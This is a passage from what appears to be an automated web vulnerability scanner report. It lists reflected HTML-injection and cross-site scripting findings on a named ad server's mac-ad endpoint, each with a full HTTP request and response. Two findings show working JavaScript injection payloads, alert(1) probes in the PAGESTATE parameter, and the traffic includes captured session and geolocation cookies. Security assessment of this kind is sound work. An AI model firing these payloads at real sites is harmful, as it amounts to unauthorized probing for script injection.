Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:27:24 GMT
Server: Apache/2.2
Content-Length: 466
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:27:24 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=172368<a>f636bfc26e7&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='172368636267' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw1.cnet.com::25825719
...[SNIP]...

3.496. http://mads.bnet.com/mac-ad [CELT parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 9abcc<a>3c1b90079f8 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js9abcc<a>3c1b90079f8&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:23:58 GMT
Server: Apache/2.2
Content-Length: 587
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Wed, 27 Apr 2011 23:23:58 GMT


...[SNIP]...

3.497. http://mads.bnet.com/mac-ad [CID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the CID request parameter is copied into the HTML document as plain text between tags. The payload 57913<a>89def0162d9 was submitted in the CID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=057913<a>89def0162d9&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:25:32 GMT
Server: Apache/2.2
Content-Length: 505
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:25:32 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=057913<a>89def0162d9&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='252' PTYPE='2001' NCAT='1:' CID='05
...[SNIP]...

3.498. http://mads.bnet.com/mac-ad [COOKIE%3AANON_ID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the COOKIE%3AANON_ID request parameter is copied into the HTML document as plain text between tags. The payload 2907f<a>91e11c795cf was submitted in the COOKIE%3AANON_ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs2907f<a>91e11c795cf&x-cb=1962313&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; MAD_FIRSTPAGE=0; reg-overlay=1; __utmz=243208273.1303947369.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243208273.1852203933.1303947369.1303947369.1303947369.1; __utmc=243208273; __utmb=243208273.1.10.1303947369; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:41:10 GMT
Server: Apache/2.2
Content-Length: 500
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:41:10 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs2907f<a>91e11c795cf&x-cb=1962313&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='252' PTYPE='2001' NCAT='1:' CID='0' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-JsonEn
...[SNIP]...

3.499. http://mads.bnet.com/mac-ad [DVAR_INSTLANG parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload 6d6fe<a>ff6f83710ad was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US6d6fe<a>ff6f83710ad&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:26:17 GMT
Server: Apache/2.2
Content-Length: 488
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:26:17 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US6d6fe<a>ff6f83710ad&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='252' PTYPE='2001' NCAT='1:' CID='0' TO BEACON TEXT) *//* MAC [r2010
...[SNIP]...

3.500. http://mads.bnet.com/mac-ad [GLOBAL&CLIENT:ID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload 38b61<a>a4b68b442fa was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS38b61<a>a4b68b442fa&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:23:36 GMT
Server: Apache/2.2
Content-Length: 488
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:23:36 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS38b61<a>a4b68b442fa&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP
...[SNIP]...

3.501. http://mads.bnet.com/mac-ad [IREFER_HOST parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the IREFER_HOST request parameter is copied into the HTML document as plain text between tags. The payload 71c62<a>edaff49cb2c was submitted in the IREFER_HOST parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com71c62<a>edaff49cb2c&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:27:02 GMT
Server: Apache/2.2
Content-Length: 488
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:27:02 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com71c62<a>edaff49cb2c&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='252' PTYPE='2001' NCAT='1:' CID='0' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1
...[SNIP]...

3.502. http://mads.bnet.com/mac-ad [NCAT parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload 32626<a>dfd856e16f4 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A32626<a>dfd856e16f4&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:24:48 GMT
Server: Apache/2.2
Content-Length: 506
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:24:48 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A32626<a>dfd856e16f4&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='252' PTYPE='2001'
...[SNIP]...

3.503. http://mads.bnet.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98e72'%3balert(1)//2d3e0540668 was submitted in the PAGESTATE parameter. This input was echoed as 98e72';alert(1)//2d3e0540668 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=98e72'%3balert(1)//2d3e0540668&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:24:22 GMT
Server: Apache/2.2
Content-Length: 553
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:24:22 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=98e72'%3balert(1)//2d3e0540668&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='252' PTYPE='2001' NCAT='1:' CID='0' TO BEACON TEXT) */;window.CBSI_PAGESTATE='98e72';alert(1)//2d3e0540668';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw2.cnet.com::2540428176 2011.04.27.23.24.22 *//* MAC T 0.0.0.0 */

3.504. http://mads.bnet.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload 87eeb*/alert(1)//b11881ddb01 was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=87eeb*/alert(1)//b11881ddb01&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:24:24 GMT
Server: Apache/2.2
Content-Length: 551
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:24:24 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=87eeb*/alert(1)//b11881ddb01&SITE=252&NCAT=1%3A&PTYPE=2001&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE=
...[SNIP]...

3.505. http://mads.bnet.com/mac-ad [PTYPE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.bnet.com
Path:	/mac-ad

Issue detail

The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload e7710<a>0ef8572a5a4 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=252&NCAT=1%3A&PTYPE=2001e7710<a>0ef8572a5a4&CID=0&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=10328651&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/?tag=hdr;cnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:25:10 GMT
Server: Apache/2.2
Content-Length: 505
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
